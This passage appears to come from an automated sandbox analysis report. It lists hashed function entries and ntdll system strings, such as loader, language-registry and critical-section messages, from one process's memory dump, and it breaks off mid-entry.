                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 2994545307-1948996284
                                                                    • Opcode ID: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
                                                                    • Instruction ID: f83cad0f77f1e1acfac815fb1c367fb941cf098021bba74f931b628fc1658918
                                                                    • Opcode Fuzzy Hash: 5b155dee4ac2f104d29776e4136ebdcee34e9003141de33132211d05d55104c5
                                                                    • Instruction Fuzzy Hash: F7911771A0021ADFEF29DF9DD8809BAF7B9FF45314B054169EA05AB245D730EE01CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • LdrpCompleteMapModule, xrefs: 01799898
                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01799891
                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 017998A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                    • API String ID: 0-1676968949
                                                                    • Opcode ID: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                    • Instruction ID: d6eb9ba34fec9a99016bf9d9874609c7bce81d4c8cf3171309d0c1f74906b6fe
                                                                    • Opcode Fuzzy Hash: 45988d96e78120fda15e52932e13ccaa5cee8d6b55984b256204a8a559ef48ee
                                                                    • Instruction Fuzzy Hash: 8951F031600742DFEB3ACB6CC984B6AFBE4AB48314F040699EA519B7D1D770ED01CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • @, xrefs: 0173E6C0
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0173E68C
                                                                    • InstallLanguageFallback, xrefs: 0173E6DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                    • Instruction ID: ac74e9e49e8f8a8f5132b83b451f0a2a282221485ac2ecaddbb54d9a812e6d4d
                                                                    • Opcode Fuzzy Hash: 5418c3fdc1c0fabba01ad9d8fa468504d11fa46b422536de9d98f372d5966bd1
                                                                    • Instruction Fuzzy Hash: A451E3B25043169BDB12DF28D444A6BF7E8BF88754F04092EFA85E7251FB34D908C7A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction ID: 0740cdbb995cab34f0e53a99819eeef9d8d997156b215ec6b14116439eff0f5d
                                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction Fuzzy Hash: 0B915E312043429BE725CE29C845B1BFBE5AF84714F15892DF795CB394EB74E904CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                    • Instruction ID: 987a4dd388b623d827758810d01e16c851817a02aeb56e3b161a3af61a70524a
                                                                    • Opcode Fuzzy Hash: 0b335bfae2ed7f5992b64ac01c42aa55097abf0510e4acf8fbc8cbf95efe5b61
                                                                    • Instruction Fuzzy Hash: C35169B1A456099FDB25DFA8C880BEEFBF8FB48704F14406DE609EB251DB719941CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _vswprintf_s
                                                                    • String ID:
                                                                    • API String ID: 677850445-0
                                                                    • Opcode ID: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                    • Instruction ID: 1b26aff647abe7cc315bcd2716ab930288204801cac0d8a805b94d6f25666822
                                                                    • Opcode Fuzzy Hash: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                    • Instruction Fuzzy Hash: 1B51D071D002598EEF31CF68DA45BBEFBB0BF04724F1041ADD85AAB286D774494ACB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0175B9A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 885266447-0
                                                                    • Opcode ID: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                    • Instruction ID: 2a74dec0e982dd4f5065e1a3f178642d08ce6a33d6d8a91ab6936bfeb7b23554
                                                                    • Opcode Fuzzy Hash: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                    • Instruction Fuzzy Hash: CA515771A08341CFC761CF68C48492AFBF6FB88610F54896EFA8587359D7B0E944CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                    • Instruction ID: 03d357e5aa6c5c6402f02df7a2fcf14a97e0051d8816305002376e01b5852c9b
                                                                    • Opcode Fuzzy Hash: d160cdb94162fe9098f82d0b14f3e7f858d077709b5b466ca28b19c602d4ca8b
                                                                    • Instruction Fuzzy Hash: 89C1AE71E00219DBDB65DFA9D880BADFBB9FF48700F448029EA01BB255D738A941CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 017ABE0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                    • API String ID: 0-865735534
                                                                    • Opcode ID: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                    • Instruction ID: d3b6a75d3459f13d9bc8c6a78d1975422957f03960541ff1a06fca7650bc54d9
                                                                    • Opcode Fuzzy Hash: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                    • Instruction Fuzzy Hash: 76A12731B006068BEB26CF6DD46477AF7A9BF88710F04466AEE16CB685DB30D841CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Re-Waiting
                                                                    • API String ID: 0-316354757
                                                                    • Opcode ID: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                    • Instruction ID: f1a45e618574e515110a7a0a676e0abaedd83a8259b47e69e37236aa2cf261e3
                                                                    • Opcode Fuzzy Hash: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                    • Instruction Fuzzy Hash: DC614931A80605AFDB32EF6CC848B7EFBA5EB89720F140299D911972C3C7749A40C792
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                    • Instruction ID: 3fade79c59492b8636afd0b81d25e857c77243cb288bcffcbf46c6478ca2c107
                                                                    • Opcode Fuzzy Hash: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                    • Instruction Fuzzy Hash: 4A51AE713043469FD766DF18D888B1BBBE5EB84754F04092CFA86C72D1D670EA05C762
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction ID: 3f4fa881d529af272c795c4c953397c39a414e0de4cc9fbbb8fdb96a1bebc4d3
                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                    • Instruction Fuzzy Hash: 4A516A715057119BC320DF29C840A6BFBF8FF88750F008A29FA9687690E7B4E954CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryHash
                                                                    • API String ID: 0-2202222882
                                                                    • Opcode ID: e0c6f27b89089bf2548a3f387f79c75bfc305838fb53dc2df21fde3c2be92b4f
                                                                    • Instruction ID: 4f99cf09917ad69c0e9c5bc25ee789d000d849e6f1af52a65525d4806a91a753
                                                                    • Opcode Fuzzy Hash: e0c6f27b89089bf2548a3f387f79c75bfc305838fb53dc2df21fde3c2be92b4f
                                                                    • Instruction Fuzzy Hash: 9A4142B1D0152DABDF21DA50CC84FEEF77CAB44718F1045A5EB09AB240DB309E888FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `
                                                                    • API String ID: 0-2679148245
                                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction ID: 533f999664bf30a4dbaea685daa1f93af2fa9ea76e2b001e5b29a3fd1dcd7eb1
                                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                    • Instruction Fuzzy Hash: 8131043260434A6BE751DE28CC44F97BBDAEBC4794F144229FA59DB2C0D770EA04C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: BinaryName
                                                                    • API String ID: 0-215506332
                                                                    • Opcode ID: e38941842c79dff3ae6eb6805109d2a4c98763f56fa3b67dfcb5c544038ce145
                                                                    • Instruction ID: 4a69a86f808a3aab3a3f6ff06b2795fd867190167ac21bfa2a6587c987ae8bc8
                                                                    • Opcode Fuzzy Hash: e38941842c79dff3ae6eb6805109d2a4c98763f56fa3b67dfcb5c544038ce145
                                                                    • Instruction Fuzzy Hash: 5131E33290161ABFEB15DA5CC985FABFB74FB80B24F124169E915A7250D7309E80C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 50d2999da79d5ba97ead383cce5d0d1162c33d808075b2c344eaf7d57c76a438
                                                                    • Instruction ID: 173a1cb405d1c10249abf62e5897b1b9145fe93137489e70d42c1ea6c5be39e3
                                                                    • Opcode Fuzzy Hash: 50d2999da79d5ba97ead383cce5d0d1162c33d808075b2c344eaf7d57c76a438
                                                                    • Instruction Fuzzy Hash: B331ADB2618305DFC721DF69C98496BFBECEB89654F00092EF9D583250E634DD08CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: WindowsExcludedProcs
                                                                    • API String ID: 0-3583428290
                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction ID: 5a0c5af2491a966f86f5e2ffbd36618415e92fd25f239223d1f7400d5c0ca6b8
                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                    • Instruction Fuzzy Hash: 7D21073A900229ABDF22EA5DDC44F6BFBADEF41650F454465FE048B200E730EC50DBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Actx
                                                                    • API String ID: 0-89312691
                                                                    • Opcode ID: 0f1c0d08af7a323071c1021d4ea50adcf097d2fae2cf3fbb161d729469767d87
                                                                    • Instruction ID: 169fc1de024de54d5be7624929bc08327bb573ff207cf31a5c04757625d575e7
                                                                    • Opcode Fuzzy Hash: 0f1c0d08af7a323071c1021d4ea50adcf097d2fae2cf3fbb161d729469767d87
                                                                    • Instruction Fuzzy Hash: FC11B2353456428BFBA54E1D8490736F696EB96624FA44D7AED62CB391EBF0C8408740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Critical error detected %lx, xrefs: 017E8E21
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Critical error detected %lx
                                                                    • API String ID: 0-802127002
                                                                    • Opcode ID: 2249dd587e1754d22fc79fce102a5a9d08662ea174fc3e2e107635b0bfc8eed1
                                                                    • Instruction ID: 88ae31e2eb68994817b49e7e31ea05353d95334b08ddedcb616ef67929d824b6
                                                                    • Opcode Fuzzy Hash: 2249dd587e1754d22fc79fce102a5a9d08662ea174fc3e2e107635b0bfc8eed1
                                                                    • Instruction Fuzzy Hash: CD1123B1D55348DADB29DFA8C909B9CFBF0AB18714F24426EE569AB282C2740602CF15
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 017CFF60
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                    • API String ID: 0-1911121157
                                                                    • Opcode ID: 18af798cf52eb6465d222bec8406333ab7cc467e57d45d1016fda0ecc836b7cf
                                                                    • Instruction ID: 87f4f77d054343dd8cca38383477aea29cb2af32ffe8cf053810f0d76406bb51
                                                                    • Opcode Fuzzy Hash: 18af798cf52eb6465d222bec8406333ab7cc467e57d45d1016fda0ecc836b7cf
                                                                    • Instruction Fuzzy Hash: 0211E171950145EFDB26EF94C848F98FBB2FF08B14F15804CF504972A1C7799A80DB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e71bf1d1e2e2abb5fb86f0daade9baf6f69b9dbb61087ff218eb3f04cfea9f05
                                                                    • Instruction ID: 330e8f15d84c87f4f2e520ea09b5d50385cd9eb4da833a75bb47520fb4c4209d
                                                                    • Opcode Fuzzy Hash: e71bf1d1e2e2abb5fb86f0daade9baf6f69b9dbb61087ff218eb3f04cfea9f05
                                                                    • Instruction Fuzzy Hash: B6425C75900229CFDB65CF68CC80BA9BBB1FF45304F1581AAD94DEB282E7349A95CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32548e2968b7b21aabf5e1efb254ddf75bd97b35f3aec7fde8d959a44d3e91ab
                                                                    • Instruction ID: 21e4d98f1f781319e117b6b1c178d76f6c555c9a4f77ea7a497be37a3c7fc03f
                                                                    • Opcode Fuzzy Hash: 32548e2968b7b21aabf5e1efb254ddf75bd97b35f3aec7fde8d959a44d3e91ab
                                                                    • Instruction Fuzzy Hash: 93F19C706082118FCB64CF18C484A7AFBE1FF88754F14496EF98ACB291EB74D985CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 747fa1eadc8878f6df42c0729c42c257524739ee22ccf8ac88259512944f0dd2
                                                                    • Instruction ID: 76c3b8561ea9b8608579469515b5c70372a931b49d3aa5f5a5055e1b9f6aae64
                                                                    • Opcode Fuzzy Hash: 747fa1eadc8878f6df42c0729c42c257524739ee22ccf8ac88259512944f0dd2
                                                                    • Instruction Fuzzy Hash: 27F1C135A083419FDB66CF2CC84476AFBE9AFC5324F09865DED959B282D734D841CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36becccf5b64c0dd51d787596966f98300a60ebd287561bab7b2e57bc766da0e
                                                                    • Instruction ID: d74f0309c79f7474d4e1f6ee19f6091e4471948c9baf7f03f80e260777580ce7
                                                                    • Opcode Fuzzy Hash: 36becccf5b64c0dd51d787596966f98300a60ebd287561bab7b2e57bc766da0e
                                                                    • Instruction Fuzzy Hash: 46E1DE30A0035ACFEB32CF68D884BA9F7B6BF56304F0441D9D94997291D774AA85CF52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a84e149922692a3d51df814dab840c9bc0bd7e493600f22ab26155e0523c8112
                                                                    • Instruction ID: 6b8f1068f71d154bc2d7adfa9aa0d569f6c7704b36d00655ba30f09cd52fc404
                                                                    • Opcode Fuzzy Hash: a84e149922692a3d51df814dab840c9bc0bd7e493600f22ab26155e0523c8112
                                                                    • Instruction Fuzzy Hash: A7B15A70E00209DFDF25DFE9C984AADFBB9FF58304F10412AE605AB24AD774A945CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3564f446fd4fdd4e354222e0b686704543b3be3285c1846148f314ba0131ecc
                                                                    • Instruction ID: ae7be00edb6736973086db3f6be9f34e3296aeacf23a13ff2ba614ec43659b5f
                                                                    • Opcode Fuzzy Hash: a3564f446fd4fdd4e354222e0b686704543b3be3285c1846148f314ba0131ecc
                                                                    • Instruction Fuzzy Hash: 21316D716053018FE364CF1DC900B26FBE8FB88B00F85496DFA9497251D771D844CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b233618da2ff11f67d5d95d99e8bd559a1beda6d81137f56a4e847bddf11b98
                                                                    • Instruction ID: c172aa7b7a83e3f453e8dd9d5aa2755188b81e44c135de8386bc5c87a2f392b5
                                                                    • Opcode Fuzzy Hash: 2b233618da2ff11f67d5d95d99e8bd559a1beda6d81137f56a4e847bddf11b98
                                                                    • Instruction Fuzzy Hash: 9231D772A00119EBCF159F68CD41A7FF7B8EF54700F014469F901DB154E7759A11DBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 358a09483a93221c9f182f86bc6aaf07aad0f95bb86f2fa9bc5d1950381b48a2
                                                                    • Instruction ID: 2da737b622d10fc7acef3b14bd7fc161c96edc63e472c46613a67d059e90026d
                                                                    • Opcode Fuzzy Hash: 358a09483a93221c9f182f86bc6aaf07aad0f95bb86f2fa9bc5d1950381b48a2
                                                                    • Instruction Fuzzy Hash: 903102322057119BCF32EF58C988B2AFBE4FFC1710F424569E85647255CB70DA40CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a8e58a225408a9367dd094da4c0a16b853bffd3e8fcc762e2d48e154a22edb0d
                                                                    • Instruction ID: b1fbac52038a8b14770462d87df1fceaa94f686648e0b5d3ea65621a02840f71
                                                                    • Opcode Fuzzy Hash: a8e58a225408a9367dd094da4c0a16b853bffd3e8fcc762e2d48e154a22edb0d
                                                                    • Instruction Fuzzy Hash: 4B4181B1D002189FDB24CFAAD985AEDFBF4FB48710F5081AEE509A7640E7745A84CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a29ad40e4cd8ac25a21f041b0b6f4f147bf12ba04caa0003dbbb366746f77cf2
                                                                    • Instruction ID: f19f20d1bdbf6393c6fe64a508d18acaf7f56c1bdfd7d420de360869f49bc190
                                                                    • Opcode Fuzzy Hash: a29ad40e4cd8ac25a21f041b0b6f4f147bf12ba04caa0003dbbb366746f77cf2
                                                                    • Instruction Fuzzy Hash: 38318E79A14249EFD744CF58C845B9AFBE8FB18314F148256F904CB341EA35E980CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eb155c6482573b0f61a4e4030b7b7d9877cb83d6d8ec7a0a3cdec943ff43bb40
                                                                    • Instruction ID: 9821613bca001d05307d50fff6aed1eea652281a2cc3d0ee1f2f3ea107b02cdd
                                                                    • Opcode Fuzzy Hash: eb155c6482573b0f61a4e4030b7b7d9877cb83d6d8ec7a0a3cdec943ff43bb40
                                                                    • Instruction Fuzzy Hash: 6A31F7366006559BCB22DF58C4807A6B7B8FF25310F244075DE45DF24AFB74DA45CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5fa2f99bf507ac0e140803a1b6ba68f405804ca42ba4c1ab6efd406b71428cb6
                                                                    • Instruction ID: 111301233e60f676a81678e697f9d33da28f1b1361eed157911d5f02cdb557ca
                                                                    • Opcode Fuzzy Hash: 5fa2f99bf507ac0e140803a1b6ba68f405804ca42ba4c1ab6efd406b71428cb6
                                                                    • Instruction Fuzzy Hash: 70319F75A05645DFEB76DB6CC488BACFBF1BB89318F148149C60477282C3B5AA80CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                    • Instruction ID: 953692d9161c92d3fe9bc7162218f207ff7c696503c580e07d8142451f342372
                                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                    • Instruction Fuzzy Hash: 89217C72640119EBD721CF99CC88EAAFBBDEF89642F514095EA0597220D674EE11CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bdef9b0a9080064d69eec78b73468096923797aea83050c85ef4c4429ac8bc6a
                                                                    • Instruction ID: a7b97ef962dc65b205181a95dec00eb2186b4c70e495b4cdf351bd4ac9ea62af
                                                                    • Opcode Fuzzy Hash: bdef9b0a9080064d69eec78b73468096923797aea83050c85ef4c4429ac8bc6a
                                                                    • Instruction Fuzzy Hash: 4B318D31601B04CFDB62CF2CC844B9AF7E5FF89714F14856DE99A87A90EB75A901CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 35f9020177b1160dd0bdb4f1c041bff8920a6a47f76082e12872461df6cada86
                                                                    • Instruction ID: f327198102a2f6439af22b6ad1f8cd522f8919025b3dbbe836c7b2ff73d3c1ff
                                                                    • Opcode Fuzzy Hash: 35f9020177b1160dd0bdb4f1c041bff8920a6a47f76082e12872461df6cada86
                                                                    • Instruction Fuzzy Hash: 482197B2A00645ABD715DB68D884F6AB7B8FF48700F1400A9FA09CB791E734E950CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
